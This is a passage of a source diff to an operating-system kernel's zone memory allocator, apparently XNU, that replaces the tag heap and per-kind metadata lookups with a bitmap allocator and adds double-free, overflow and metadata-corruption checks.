__abortlike __unused static void zone_invalid_foreign_addr_panic(zone_t zone, vm_offset_t addr) @@ -554,6 +745,15 @@ zone_page_meta_accounting_panic(zone_t zone, struct zone_page_metadata *meta, zone_heap_name(zone), zone->z_name, meta); } +__abortlike +static void +zone_meta_double_free_panic(zone_t zone, zone_element_t ze, const char *caller) +{ + panic("%s: double free of %p to zone %s%s", caller, + (void *)zone_element_addr(ze, zone_elem_size(zone)), + zone_heap_name(zone), zone->z_name); +} + __abortlike static void zone_accounting_panic(zone_t zone, const char *kind) @@ -562,6 +762,52 @@ zone_accounting_panic(zone_t zone, const char *kind) zone_heap_name(zone), zone->z_name); } +#define zone_counter_sub(z, stat, value) ({ \ + if (os_sub_overflow((z)->stat, value, &(z)->stat)) { \ + zone_accounting_panic(z, #stat " wrap-around"); \ + } \ + (z)->stat; \ +}) + +static inline void +zone_elems_free_add(zone_t z, uint32_t count) +{ + uint32_t n = (z->z_elems_free += count); + if (z->z_elems_free_max < n) { + z->z_elems_free_max = n; + } +} + +static inline void +zone_elems_free_sub(zone_t z, uint32_t count) +{ + uint32_t n = zone_counter_sub(z, z_elems_free, count); + + if (z->z_elems_free_min > n) { + z->z_elems_free_min = n; + } +} + +static inline uint16_t +zone_meta_alloc_size_add(zone_t z, struct zone_page_metadata *m, + vm_offset_t esize) +{ + if (os_add_overflow(m->zm_alloc_size, (uint16_t)esize, &m->zm_alloc_size)) { + zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around"); + } + return m->zm_alloc_size; +} + +static inline uint16_t +zone_meta_alloc_size_sub(zone_t z, struct zone_page_metadata *m, + vm_offset_t esize) +{ + if (os_sub_overflow(m->zm_alloc_size, esize, &m->zm_alloc_size)) { + zone_page_meta_accounting_panic(z, m, "alloc_size wrap-around"); + } + return m->zm_alloc_size; +} + __abortlike static void zone_nofail_panic(zone_t zone) @@ -603,21 +849,15 @@ zone_range_size(const struct zone_map_range *r) return rmax - rmin; } -#define from_zone_map(addr, size) \ - zone_range_contains(&zone_info.zi_map_range, (vm_offset_t)(addr), size) - -#define from_general_submap(addr, size) \ - zone_range_contains(&zone_info.zi_general_range, (vm_offset_t)(addr), size) +#define from_zone_map(addr, size, kind) \ + zone_range_contains(&zone_info.zi_map_range[kind], \ + (vm_offset_t)(addr), size) -#define from_foreign_range(addr, size) \ - zone_range_contains(&zone_info.zi_foreign_range, (vm_offset_t)(addr), size) +#define zone_native_size() \ + zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_NATIVE]) -#define from_native_meta_map(addr) \ - zone_range_contains(&zone_info.zi_meta_range, (vm_offset_t)(addr), \ - sizeof(struct zone_page_metadata)) - -#define zone_addr_kind(addr, size) \ - (from_zone_map(addr, size) ? ZONE_ADDR_NATIVE : ZONE_ADDR_FOREIGN) +#define zone_foreign_size() \ + zone_range_size(&zone_info.zi_map_range[ZONE_ADDR_FOREIGN]) __header_always_inline bool zone_pva_is_null(zone_pva_t page) @@ -663,6 +903,12 @@ zone_pva_from_addr(vm_address_t addr) return (zone_pva_t){ (uint32_t)((intptr_t)addr >> PAGE_SHIFT) }; } +__header_always_inline zone_pva_t +zone_pva_from_element(zone_element_t ze) +{ + return zone_pva_from_addr(ze.ze_value); +} + __header_always_inline vm_address_t zone_pva_to_addr(zone_pva_t page) { @@ -671,52 +917,44 @@ zone_pva_to_addr(zone_pva_t page) } __header_always_inline struct zone_page_metadata * -zone_pva_to_meta(zone_pva_t page, zone_addr_kind_t kind) +zone_pva_to_meta(zone_pva_t page) { - if (kind == ZONE_ADDR_NATIVE) { - return &zone_info.zi_array_base[page.packed_address]; - } else { - return (struct zone_page_metadata *)zone_pva_to_addr(page); - } + return &zone_info.zi_meta_base[page.packed_address]; } __header_always_inline zone_pva_t -zone_pva_from_meta(struct zone_page_metadata *meta, zone_addr_kind_t kind) +zone_pva_from_meta(struct zone_page_metadata *meta) { - if (kind == ZONE_ADDR_NATIVE) { - uint32_t index = (uint32_t)(meta - zone_info.zi_array_base); - return (zone_pva_t){ index }; - } else { - return zone_pva_from_addr((vm_address_t)meta); - } + return (zone_pva_t){ (uint32_t)(meta - zone_info.zi_meta_base) }; } __header_always_inline struct zone_page_metadata * -zone_meta_from_addr(vm_offset_t addr, zone_addr_kind_t kind) +zone_meta_from_addr(vm_offset_t addr) { - if (kind == ZONE_ADDR_NATIVE) { - return zone_pva_to_meta(zone_pva_from_addr(addr), kind); - } else { - return (struct zone_page_metadata *)trunc_page(addr); - } + return zone_pva_to_meta(zone_pva_from_addr(addr)); +} + +__header_always_inline struct zone_page_metadata * +zone_meta_from_element(zone_element_t ze) +{ + return zone_pva_to_meta(zone_pva_from_element(ze)); } -#define zone_native_meta_from_addr(addr) \ - zone_meta_from_addr((vm_offset_t)(addr), ZONE_ADDR_NATIVE) +__header_always_inline zone_id_t +zone_index_from_ptr(const void *ptr) +{ + return zone_pva_to_meta(zone_pva_from_addr((vm_offset_t)ptr))->zm_index; +} __header_always_inline vm_offset_t -zone_meta_to_addr(struct zone_page_metadata *meta, zone_addr_kind_t kind) +zone_meta_to_addr(struct zone_page_metadata *meta) { - if (kind == ZONE_ADDR_NATIVE) { - return ptoa((int)(meta - zone_info.zi_array_base)); - } else { - return (vm_offset_t)meta; - } + return ptoa((int32_t)(meta - zone_info.zi_meta_base)); } __header_always_inline void zone_meta_queue_push(zone_t z, zone_pva_t *headp, - struct zone_page_metadata *meta, zone_addr_kind_t kind) + struct zone_page_metadata *meta) { zone_pva_t head = *headp; zone_pva_t queue_pva = zone_queue_encode(headp); @@ -724,34 +962,30 @@ zone_meta_queue_push(zone_t z, zone_pva_t *headp, meta->zm_page_next = head; if (!zone_pva_is_null(head)) { - tmp = zone_pva_to_meta(head, kind); + tmp = zone_pva_to_meta(head); if (!zone_pva_is_equal(tmp->zm_page_prev, queue_pva)) { zone_page_metadata_list_corruption(z, meta); } - tmp->zm_page_prev = zone_pva_from_meta(meta, kind); + tmp->zm_page_prev = zone_pva_from_meta(meta); } meta->zm_page_prev = queue_pva; - *headp = zone_pva_from_meta(meta, kind); + *headp = zone_pva_from_meta(meta); } __header_always_inline struct zone_page_metadata * -zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind, - vm_offset_t *page_addrp) +zone_meta_queue_pop_native(zone_t z, zone_pva_t *headp, vm_offset_t *page_addrp) { zone_pva_t head = *headp; - struct zone_page_metadata *meta = zone_pva_to_meta(head, kind); + struct zone_page_metadata *meta = zone_pva_to_meta(head); vm_offset_t page_addr = zone_pva_to_addr(head); struct zone_page_metadata *tmp; - if (kind == ZONE_ADDR_NATIVE && !from_native_meta_map(meta)) { + if (!from_zone_map(page_addr, 1, ZONE_ADDR_NATIVE)) { zone_page_metadata_native_queue_corruption(z, headp); } - if (kind == ZONE_ADDR_FOREIGN && from_zone_map(meta, sizeof(*meta))) { - zone_page_metadata_foreign_queue_corruption(z, headp); - } if (!zone_pva_is_null(meta->zm_page_next)) { - tmp = zone_pva_to_meta(meta->zm_page_next, kind); + tmp = zone_pva_to_meta(meta->zm_page_next); if (!zone_pva_is_equal(tmp->zm_page_prev, head)) { zone_page_metadata_list_corruption(z, meta); } @@ -759,19 +993,24 @@ zone_meta_queue_pop(zone_t z, zone_pva_t *headp, zone_addr_kind_t kind, } *headp = meta->zm_page_next; + meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 }; *page_addrp = page_addr; + + if (!zone_has_index(z, meta->zm_index)) { + zone_page_metadata_index_confusion_panic(z, + zone_meta_to_addr(meta), meta); + } return meta; } __header_always_inline void -zone_meta_requeue(zone_t z, zone_pva_t *headp, - struct zone_page_metadata *meta, zone_addr_kind_t kind) +zone_meta_remqueue(zone_t z, struct zone_page_metadata *meta) { - zone_pva_t meta_pva = zone_pva_from_meta(meta, kind); + zone_pva_t meta_pva = zone_pva_from_meta(meta); struct zone_page_metadata *tmp; if (!zone_pva_is_null(meta->zm_page_next)) { - tmp = zone_pva_to_meta(meta->zm_page_next, kind); + tmp = zone_pva_to_meta(meta->zm_page_next); if (!zone_pva_is_equal(tmp->zm_page_prev, meta_pva)) { zone_page_metadata_list_corruption(z, meta); } @@ -780,14 +1019,48 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp, if (zone_pva_is_queue(meta->zm_page_prev)) { zone_queue_set_head(z, meta->zm_page_prev, meta_pva, meta); } else { - tmp = zone_pva_to_meta(meta->zm_page_prev, kind); + tmp = zone_pva_to_meta(meta->zm_page_prev); if (!zone_pva_is_equal(tmp->zm_page_next, meta_pva)) { zone_page_metadata_list_corruption(z, meta); } tmp->zm_page_next = meta->zm_page_next; } - zone_meta_queue_push(z, headp, meta, kind); + meta->zm_page_next = meta->zm_page_prev = (zone_pva_t){ 0 }; +} + +__header_always_inline void +zone_meta_requeue(zone_t z, zone_pva_t *headp, + struct zone_page_metadata *meta) +{ + zone_meta_remqueue(z, meta); + zone_meta_queue_push(z, headp, meta); +} + +/* prevents a given metadata from ever reaching the z_pageq_empty queue */ +static inline void +zone_meta_lock_in_partial(zone_t z, struct zone_page_metadata *m, uint32_t len) +{ + uint16_t new_size = zone_meta_alloc_size_add(z, m, ZM_ALLOC_SIZE_LOCK); + + assert(new_size % sizeof(vm_offset_t) == ZM_ALLOC_SIZE_LOCK); + if (new_size == ZM_ALLOC_SIZE_LOCK) { + zone_meta_requeue(z, &z->z_pageq_partial, m); + zone_counter_sub(z, z_wired_empty, len); + } +} + +/* allows a given metadata to reach the z_pageq_empty queue again */ +static inline void +zone_meta_unlock_from_partial(zone_t z, struct zone_page_metadata *m, uint32_t len) +{ + uint16_t new_size = zone_meta_alloc_size_sub(z, m, ZM_ALLOC_SIZE_LOCK); + + assert(new_size % sizeof(vm_offset_t) == 0); + if (new_size == 0) { + zone_meta_requeue(z, &z->z_pageq_empty, m); + z->z_wired_empty += len; + } } /* @@ -795,8 +1068,10 @@ zone_meta_requeue(zone_t z, zone_pva_t *headp, * Must be called without the zone lock held as it might potentially block. */ static void -zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *to) +zone_meta_populate(vm_offset_t base, vm_size_t size) { + struct zone_page_metadata *from = zone_meta_from_addr(base); + struct zone_page_metadata *to = from + atop(size); vm_offset_t page_addr = trunc_page(from); for (; page_addr < (vm_offset_t)to; page_addr += PAGE_SIZE) { @@ -838,54 +1113,59 @@ zone_meta_populate(struct zone_page_metadata *from, struct zone_page_metadata *t } } -static inline bool -zone_allocated_element_offset_is_valid(zone_t zone, vm_offset_t addr, - vm_offset_t page, zone_addr_kind_t kind) +__header_always_inline +struct zone_page_metadata * +zone_element_validate(zone_t zone, zone_element_t ze) { - vm_offset_t offs = addr - page - ZONE_PAGE_FIRST_OFFSET(kind); - vm_offset_t esize = zone_elem_size(zone); + struct zone_page_metadata *meta; + vm_offset_t page = zone_element_base(ze); - if (esize & (esize - 1)) { /* not a power of 2 */ - return (offs % esize) == 0; - } else { - return (offs & (esize - 1)) == 0; + if (!from_zone_map(page, 1, ZONE_ADDR_NATIVE) && + !from_zone_map(page, 1, ZONE_ADDR_FOREIGN)) { + zone_invalid_element_panic(zone, ze); + } + meta = zone_meta_from_addr(page); + + if (meta->zm_chunk_len > ZM_CHUNK_LEN_MAX) { + zone_invalid_element_panic(zone, ze); + } + if (zone_element_idx(ze) >= zone->z_chunk_elems) { + zone_invalid_element_panic(zone, ze); + } + + if (!zone_has_index(zone, meta->zm_index)) { + vm_offset_t addr = zone_element_addr(ze, zone_elem_size(zone)); + zone_page_metadata_index_confusion_panic(zone, addr, meta); } + + return meta; } __attribute__((always_inline)) static struct zone_page_metadata * -zone_allocated_element_resolve(zone_t zone, vm_offset_t addr, - vm_offset_t *pagep, zone_addr_kind_t *kindp) +zone_element_resolve(zone_t zone, vm_offset_t addr, vm_offset_t esize, + zone_element_t *ze) { struct zone_page_metadata *meta; - zone_addr_kind_t kind; - vm_offset_t page; - vm_offset_t esize = zone_elem_size(zone); + vm_offset_t page, eidx; - kind = zone_addr_kind(addr, esize); + if (!from_zone_map(addr, esize, ZONE_ADDR_NATIVE) && + !from_zone_map(addr, esize, ZONE_ADDR_FOREIGN)) { + zone_invalid_element_addr_panic(zone, addr); + } page = trunc_page(addr); - meta = zone_meta_from_addr(addr, kind); + meta = zone_meta_from_addr(addr); - if (kind == ZONE_ADDR_NATIVE) { - if (meta->zm_secondary_page) { - if (meta->zm_percpu) { - zone_invalid_element_addr_panic(zone, addr); - } - page -= ptoa(meta->zm_page_count); - meta -= meta->zm_page_count; - } - } else if (!zone->allows_foreign) { - zone_page_metadata_foreign_confusion_panic(zone, addr); -#if __LP64__ - } else if (!from_foreign_range(addr, esize)) { - zone_invalid_foreign_addr_panic(zone, addr); -#else - } else if (!pmap_kernel_va(addr)) { + if (meta->zm_chunk_len == ZM_SECONDARY_PCPU_PAGE) { zone_invalid_element_addr_panic(zone, addr); -#endif + } + if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) { + page -= ptoa(meta->zm_page_index); + meta -= meta->zm_page_index; } - if (!zone_allocated_element_offset_is_valid(zone, addr, page, kind)) { + eidx = (addr - page) / esize; + if ((addr - page) % esize) { zone_invalid_element_addr_panic(zone, addr); } @@ -893,86 +1173,27 @@ zone_allocated_element_resolve(zone_t zone, vm_offset_t addr, zone_page_metadata_index_confusion_panic(zone, addr, meta); } - if (kindp) { - *kindp = kind; - } - if (pagep) { - *pagep = page; - } + *ze = zone_element_encode(page, eidx, ZPM_AUTO); return meta; } -__attribute__((always_inline)) -void -zone_allocated_element_validate(zone_t zone, vm_offset_t addr) -{ - zone_allocated_element_resolve(zone, addr, NULL, NULL); -} - -__header_always_inline vm_offset_t -zone_page_meta_get_freelist(zone_t zone, struct zone_page_metadata *meta, - vm_offset_t page) -{ - assert(!meta->zm_secondary_page); - if (meta->zm_freelist_offs == PAGE_METADATA_EMPTY_FREELIST) { - return 0; - } - - vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count); - if (meta->zm_freelist_offs + zone_elem_size(zone) > size) { - zone_metadata_corruption(zone, meta, "freelist corruption"); - } - - return page + meta->zm_freelist_offs; -} - -__header_always_inline void -zone_page_meta_set_freelist(struct zone_page_metadata *meta, - vm_offset_t page, vm_offset_t addr) -{ - assert(!meta->zm_secondary_page); - if (addr) { - meta->zm_freelist_offs = (uint16_t)(addr - page); - } else { - meta->zm_freelist_offs = PAGE_METADATA_EMPTY_FREELIST; - } -} - -static bool -zone_page_meta_is_sane_element(zone_t zone, struct zone_page_metadata *meta, - vm_offset_t page, vm_offset_t element, zone_addr_kind_t kind) -{ - if (element == 0) { - /* ends of the freelist are NULL */ - return true; - } - if (element < page + ZONE_PAGE_FIRST_OFFSET(kind)) { - return false; - } - vm_size_t size = ptoa(meta->zm_percpu ? 1 : meta->zm_page_count); - if (element > page + size - zone_elem_size(zone)) { - return false; - } - return true; -} - /* Routine to get the size of a zone allocated address. * If the address doesnt belong to the zone maps, returns 0. */ vm_size_t zone_element_size(void *addr, zone_t *z) { - struct zone_page_metadata *meta; struct zone *src_zone; - if (from_zone_map(addr, sizeof(void *))) { - meta = zone_native_meta_from_addr(addr); - src_zone = &zone_array[meta->zm_index]; + if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) || + from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) { + src_zone = &zone_array[zone_index_from_ptr(addr)]; if (z) { *z = src_zone; } return zone_elem_size(src_zone); } + #if CONFIG_GZALLOC if (__improbable(gzalloc_enabled())) { vm_size_t gzsize; @@ -993,11 +1214,11 @@ zone_require_panic(zone_t zone, void *addr) uint32_t zindex; zone_t other; - if (!from_zone_map(addr, zone_elem_size(zone))) { + if (!from_zone_map(addr, zone_elem_size(zone), ZONE_ADDR_NATIVE)) { panic("zone_require failed: address not in a zone (addr: %p)", addr); } - zindex = zone_native_meta_from_addr(addr)->zm_index; + zindex = zone_index_from_ptr(addr); other = &zone_array[zindex]; if (zindex >= os_atomic_load(&num_zones, relaxed) || !other->z_self) { panic("zone_require failed: invalid zone index %d " @@ -1031,5116 +1252,7322 @@ zone_id_require_panic(zone_id_t zid, void *addr) void zone_require(zone_t zone, void *addr) { - if (__probable(from_general_submap(addr, zone_elem_size(zone)) && - (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) { - return; - } + vm_size_t esize = zone_elem_size(zone); + + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) { + if (zone_has_index(zone, zone_index_from_ptr(addr))) { + return; + } #if CONFIG_GZALLOC - if (__probable(gzalloc_enabled())) { + } else if (__probable(zone->gzalloc_tracked)) { return; - } #endif + } zone_require_panic(zone, addr); } void zone_id_require(zone_id_t zid, vm_size_t esize, void *addr) { - if (__probable(from_general_submap(addr, esize) && - (zid == zone_native_meta_from_addr(addr)->zm_index))) { + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) { + if (zid == zone_index_from_ptr(addr)) { + return; + } +#if CONFIG_GZALLOC + } else if (__probable(zone_array[zid].gzalloc_tracked)) { return; +#endif } + zone_id_require_panic(zid, addr); +} + +void +zone_id_require_allow_foreign(zone_id_t zid, vm_size_t esize, void *addr) +{ + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE) || + from_zone_map(addr, esize, ZONE_ADDR_FOREIGN))) { + if (zid == zone_index_from_ptr(addr)) { + return; + } #if CONFIG_GZALLOC - if (__probable(gzalloc_enabled())) { + } else if (__probable(zone_array[zid].gzalloc_tracked)) { return; - } #endif + } zone_id_require_panic(zid, addr); } bool zone_owns(zone_t zone, void *addr) { - if (__probable(from_general_submap(addr, zone_elem_size(zone)) && - (zone_has_index(zone, zone_native_meta_from_addr(addr)->zm_index)))) { - return true; - } + vm_size_t esize = zone_elem_size(zone); + + if (__probable(from_zone_map(addr, esize, ZONE_ADDR_NATIVE))) { + return zone_has_index(zone, zone_index_from_ptr(addr)); #if CONFIG_GZALLOC - if (__probable(gzalloc_enabled())) { + } else if (__probable(zone->gzalloc_tracked)) { return true; - } #endif + } return false; } -#pragma mark ZTAGS -#if VM_MAX_TAG_ZONES +#endif /* !ZALLOC_TEST */ +#pragma mark Zone bits allocator -// for zones with tagging enabled: +/*! + * @defgroup Zone Bitmap allocator + * @{ + * + * @brief + * Functions implementing the zone bitmap allocator + * + * @discussion + * The zone allocator maintains which elements are allocated or free in bitmaps. + * + * When the number of elements per page is smaller than 32, it is stored inline + * on the @c zone_page_metadata structure (@c zm_inline_bitmap is set, + * and @c zm_bitmap used for storage). + * + * When the number of elements is larger, then a bitmap is allocated from + * a buddy allocator (impelemented under the @c zba_* namespace). Pointers + * to bitmaps are implemented as a packed 32 bit bitmap reference, stored in + * @c zm_bitmap. The low 3 bits encode the scale (order) of the allocation in + * @c ZBA_GRANULE units, and hence actual allocations encoded with that scheme + * cannot be larger than 1024 bytes (8192 bits). + * + * This buddy allocator can actually accomodate allocations as large + * as 8k on 16k systems and 2k on 4k systems. + * + * Note: @c zba_* functions are implementation details not meant to be used + * outside of the allocation of the allocator itself. Interfaces to the rest of + * the zone allocator are documented and not @c zba_* prefixed. + */ -// calculate a pointer to the tag base entry, -// holding either a uint32_t the first tag offset for a page in the zone map, -// or two uint16_t tags if the page can only hold one or two elements +#define ZBA_CHUNK_SIZE PAGE_MAX_SIZE +#define ZBA_GRANULE sizeof(uint64_t) +#define ZBA_GRANULE_BITS (8 * sizeof(uint64_t)) +#define ZBA_MAX_ORDER (PAGE_MAX_SHIFT - 4) +#define ZBA_MAX_ALLOC_ORDER 7 +#define ZBA_SLOTS (ZBA_CHUNK_SIZE / ZBA_GRANULE) +static_assert(2ul * ZBA_GRANULE << ZBA_MAX_ORDER == ZBA_CHUNK_SIZE, "chunk sizes"); +static_assert(ZBA_MAX_ALLOC_ORDER <= ZBA_MAX_ORDER, "ZBA_MAX_ORDER is enough"); + +struct zone_bits_chain { + uint32_t zbc_next; + uint32_t zbc_prev; +} __attribute__((aligned(ZBA_GRANULE))); + +struct zone_bits_head { + uint32_t zbh_next; + uint32_t zbh_unused; +} __attribute__((aligned(ZBA_GRANULE))); + +static_assert(sizeof(struct zone_bits_chain) == ZBA_GRANULE, "zbc size"); +static_assert(sizeof(struct zone_bits_head) == ZBA_GRANULE, "zbh size"); + +struct zone_bits_allocator_meta { + uint32_t zbam_chunks; + uint32_t __zbam_padding; + struct zone_bits_head zbam_lists[ZBA_MAX_ORDER + 1]; +}; -#define ZTAGBASE(zone, element) \ - (&((uint32_t *)zone_tagbase_min)[atop((element) - zone_info.zi_map_range.min_address)]) +struct zone_bits_allocator_header { + uint64_t zbah_bits[ZBA_SLOTS / (8 * sizeof(uint64_t))]; +}; -// pointer to the tag for an element -#define ZTAG(zone, element) \ - ({ \ - vm_tag_t * result; \ - if ((zone)->tags_inline) { \ - result = (vm_tag_t *) ZTAGBASE((zone), (element)); \ - if ((page_mask & element) >= zone_elem_size(zone)) result++; \ - } else { \ - result = &((vm_tag_t *)zone_tags_min)[ZTAGBASE((zone), (element))[0] + ((element) & page_mask) / zone_elem_size((zone))]; \ - } \ - result; \ - }) +#if ZALLOC_TEST +static struct zalloc_bits_allocator_test_setup { + vm_offset_t zbats_base; + void (*zbats_populate)(vm_address_t addr, vm_size_t size); +} zba_test_info; +static struct zone_bits_allocator_header * +zba_base_header(void) +{ + return (struct zone_bits_allocator_header *)zba_test_info.zbats_base; +} -static vm_offset_t zone_tagbase_min; -static vm_offset_t zone_tagbase_max; -static vm_offset_t zone_tagbase_map_size; -static vm_map_t zone_tagbase_map; +static void +zba_populate(uint32_t n) +{ + vm_address_t base = zba_test_info.zbats_base; + zba_test_info.zbats_populate(base + n * ZBA_CHUNK_SIZE, ZBA_CHUNK_SIZE); +} +#else +__startup_data +static uint8_t zba_chunk_startup[ZBA_CHUNK_SIZE] +__attribute__((aligned(ZBA_CHUNK_SIZE))); +static LCK_MTX_EARLY_DECLARE(zba_mtx, &zone_locks_grp); -static vm_offset_t zone_tags_min; -static vm_offset_t zone_tags_max; -static vm_offset_t zone_tags_map_size; -static vm_map_t zone_tags_map; +static struct zone_bits_allocator_header * +zba_base_header(void) +{ + return (struct zone_bits_allocator_header *)zone_info.zi_bits_range.min_address; +} -// simple heap allocator for allocating the tags for new memory +static void +zba_lock(void) +{ + lck_mtx_lock(&zba_mtx); +} -LCK_MTX_EARLY_DECLARE(ztLock, &zone_locks_grp); /* heap lock */ +static void +zba_unlock(void) +{ + lck_mtx_unlock(&zba_mtx); +} -enum{ - ztFreeIndexCount = 8, - ztFreeIndexMax = (ztFreeIndexCount - 1), - ztTagsPerBlock = 4 -}; +static void +zba_populate(uint32_t n) +{ + vm_size_t size = ZBA_CHUNK_SIZE; + vm_address_t addr; -struct ztBlock { -#if __LITTLE_ENDIAN__ - uint64_t free:1, - next:21, - prev:21, - size:21; -#else -// ztBlock needs free bit least significant -#error !__LITTLE_ENDIAN__ + addr = zone_info.zi_bits_range.min_address + n * size; + if (addr >= zone_info.zi_bits_range.max_address) { + zone_t z = zone_find_largest(); + panic("zba_populate: out of bitmap space, " + "likely due to memory leak in zone [%s%s] " + "(%luM, %d elements allocated)", + zone_heap_name(z), zone_name(z), + (unsigned long)zone_size_wired(z) >> 20, + zone_count_allocated(z)); + } + + for (;;) { + kern_return_t kr = KERN_SUCCESS; + + if (0 == pmap_find_phys(kernel_pmap, addr)) { + kr = kernel_memory_populate(kernel_map, addr, size, + KMA_NOPAGEWAIT | KMA_KOBJECT | KMA_ZERO, + VM_KERN_MEMORY_OSFMK); + } + + if (kr == KERN_SUCCESS) { + return; + } + + zba_unlock(); + VM_PAGE_WAIT(); + zba_lock(); + } +} #endif -}; -typedef struct ztBlock ztBlock; -static ztBlock * ztBlocks; -static uint32_t ztBlocksCount; -static uint32_t ztBlocksFree; +__pure2 +static struct zone_bits_allocator_meta * +zba_meta(void) +{ + return (struct zone_bits_allocator_meta *)&zba_base_header()[1]; +} + +__pure2 +static uint64_t * +zba_slot_base(void) +{ + return (uint64_t *)zba_base_header(); +} + +__pure2 +static vm_address_t +zba_page_addr(uint32_t n) +{ + return (vm_address_t)zba_base_header() + n * ZBA_CHUNK_SIZE; +} + +__pure2 +static struct zone_bits_head * +zba_head(uint32_t order) +{ + return &zba_meta()->zbam_lists[order]; +} +__pure2 static uint32_t -ztLog2up(uint32_t size) +zba_head_index(uint32_t order) { - if (1 == size) { - size = 0; - } else { - size = 32 - __builtin_clz(size - 1); - } - return size; + uint32_t hdr_size = sizeof(struct zone_bits_allocator_header) + + offsetof(struct zone_bits_allocator_meta, zbam_lists); + return (hdr_size / ZBA_GRANULE) + order; } +__pure2 +static struct zone_bits_chain * +zba_chain_for_index(uint32_t index) +{ + return (struct zone_bits_chain *)(zba_slot_base() + index); +} + +__pure2 static uint32_t -ztLog2down(uint32_t size) +zba_chain_to_index(const struct zone_bits_chain *zbc) { - size = 31 - __builtin_clz(size); - return size; + return (uint32_t)((const uint64_t *)zbc - zba_slot_base()); } +__abortlike static void -ztFault(vm_map_t map, const void * address, size_t size, uint32_t flags) +zba_head_corruption_panic(uint32_t order) { - vm_map_offset_t addr = (vm_map_offset_t) address; - vm_map_offset_t page, end; + panic("zone bits allocator head[%d:%p] is corrupt", order, + zba_head(order)); +} - page = trunc_page(addr); - end = round_page(addr + size); +__abortlike +static void +zba_chain_corruption_panic(struct zone_bits_chain *a, struct zone_bits_chain *b) +{ + panic("zone bits allocator freelist is corrupt (%p <-> %p)", a, b); +} - for (; page < end; page += page_size) { - if (!pmap_find_phys(kernel_pmap, page)) { - kern_return_t __unused - ret = kernel_memory_populate(map, page, PAGE_SIZE, - KMA_KOBJECT | flags, VM_KERN_MEMORY_DIAG); - assert(ret == KERN_SUCCESS); +static void +zba_push_block(struct zone_bits_chain *zbc, uint32_t order) +{ + struct zone_bits_head *hd = zba_head(order); + uint32_t hd_index = zba_head_index(order); + uint32_t index = zba_chain_to_index(zbc); + struct zone_bits_chain *next; + + if (hd->zbh_next) { + next = zba_chain_for_index(hd->zbh_next); + if (next->zbc_prev != hd_index) { + zba_head_corruption_panic(order); } + next->zbc_prev = index; } + zbc->zbc_next = hd->zbh_next; + zbc->zbc_prev = hd_index; + hd->zbh_next = index; } -static boolean_t -ztPresent(const void * address, size_t size) +static void +zba_remove_block(struct zone_bits_chain *zbc) { - vm_map_offset_t addr = (vm_map_offset_t) address; - vm_map_offset_t page, end; - boolean_t result; + struct zone_bits_chain *prev = zba_chain_for_index(zbc->zbc_prev); + uint32_t index = zba_chain_to_index(zbc); - page = trunc_page(addr); - end = round_page(addr + size); - for (result = TRUE; (page < end); page += page_size) { - result = pmap_find_phys(kernel_pmap, page); - if (!result) { - break; + if (prev->zbc_next != index) { + zba_chain_corruption_panic(prev, zbc); + } + if ((prev->zbc_next = zbc->zbc_next)) { + struct zone_bits_chain *next = zba_chain_for_index(zbc->zbc_next); + if (next->zbc_prev != index) { + zba_chain_corruption_panic(zbc, next); } + next->zbc_prev = zbc->zbc_prev; } - return result; } - -void __unused -ztDump(boolean_t sanity); -void __unused -ztDump(boolean_t sanity) +static vm_address_t +zba_try_pop_block(uint32_t order) { - uint32_t q, cq, p; + struct zone_bits_head *hd = zba_head(order); + struct zone_bits_chain *zbc; - for (q = 0; q <= ztFreeIndexMax; q++) { - p = q; - do{ - if (sanity) { - cq = ztLog2down(ztBlocks[p].size); - if (cq > ztFreeIndexMax) { - cq = ztFreeIndexMax; - } - if (!ztBlocks[p].free - || ((p != q) && (q != cq)) - || (ztBlocks[ztBlocks[p].next].prev != p) - || (ztBlocks[ztBlocks[p].prev].next != p)) { - kprintf("zterror at %d", p); - ztDump(FALSE); - kprintf("zterror at %d", p); - assert(FALSE); - } - continue; - } - kprintf("zt[%03d]%c %d, %d, %d\n", - p, ztBlocks[p].free ? 'F' : 'A', - ztBlocks[p].next, ztBlocks[p].prev, - ztBlocks[p].size); - p = ztBlocks[p].next; - if (p == q) { - break; - } - }while (p != q); - if (!sanity) { - printf("\n"); - } - } - if (!sanity) { - printf("-----------------------\n"); + if (hd->zbh_next == 0) { + return 0; } + + zbc = zba_chain_for_index(hd->zbh_next); + zba_remove_block(zbc); + return (vm_address_t)zbc; } +static struct zone_bits_allocator_header * +zba_header(vm_offset_t addr) +{ + addr &= -(vm_offset_t)ZBA_CHUNK_SIZE; + return (struct zone_bits_allocator_header *)addr; +} +static size_t +zba_node_parent(size_t node) +{ + return (node - 1) / 2; +} -#define ZTBDEQ(idx) \ - ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next; \ - ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev; +static size_t +zba_node_left_child(size_t node) +{ + return node * 2 + 1; +} -static void -ztFree(zone_t zone __unused, uint32_t index, uint32_t count) +static size_t +zba_node_buddy(size_t node) { - uint32_t q, w, p, size, merge; + return ((node - 1) ^ 1) + 1; +} - assert(count); - ztBlocksFree += count; +static size_t +zba_node(vm_offset_t addr, uint32_t order) +{ + vm_offset_t offs = (addr % ZBA_CHUNK_SIZE) / ZBA_GRANULE; + return (offs >> order) + (1 << (ZBA_MAX_ORDER - order + 1)) - 1; +} - // merge with preceding - merge = (index + count); - if ((merge < ztBlocksCount) - && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) - && ztBlocks[merge].free) { - ZTBDEQ(merge); - count += ztBlocks[merge].size; - } - - // merge with following - merge = (index - 1); - if ((merge > ztFreeIndexMax) - && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge])) - && ztBlocks[merge].free) { - size = ztBlocks[merge].size; - count += size; - index -= size; - ZTBDEQ(index); - } - - q = ztLog2down(count); - if (q > ztFreeIndexMax) { - q = ztFreeIndexMax; - } - w = q; - // queue in order of size - 